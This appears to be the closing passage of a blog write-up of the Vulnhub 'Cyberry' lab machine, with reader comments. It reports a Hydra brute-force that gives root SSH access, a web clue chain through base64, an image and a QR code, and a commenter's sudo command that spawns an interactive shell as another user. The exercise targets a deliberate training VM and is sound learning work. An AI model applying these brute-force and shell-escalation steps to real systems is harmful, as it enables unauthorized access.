Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 10:31:08

Finally, gaining SSH access as root user with password chewbacabemerry

Appendix 1

Finding http://192.168.1.104/berrypedia.html the long way:

Checking the source of http://192.168.1.104 reveals base64-encoded strings. Decoding them hints at a work-in-progress.png, which in fact contains the ASCII text edocrq. Browsing http://192.168.1.104/edocrq gives a QR code, and decoding it shows a clue about berrypedia.html.

Appendix 2

After gaining SSH access as the user nick, enumerating the home folder showed a program, makeberry, which was also hinted at by the emails in the same home directory. makeberry seemed to be vulnerable to buffer overflow exploitation. I am not good at buffer overflow exploitation; if you try to exploit it, please describe how you did it in the comments section.

8 thoughts on “Vulnhub Cyberry – 1 Writeup”

  1. Thoroughly enjoyed reading your write-up Prasanna.

    I see you also successfully bypassed any need to explore the buffer overflow on “makeberry” in Nick's home folder by using: sudo -u terry /home/nick/invoke.sh /bin/bash -i
    🙂

    It’s also always interesting to see the different process and methodology people use to get the final root password based on the clues given.

    Excellent work 🙂

    Cyberry

    1. Thank you!! 🙂
      I saw that program and I am not good at buffer overflow exploitations. I will try that method too, once I learn the required things.
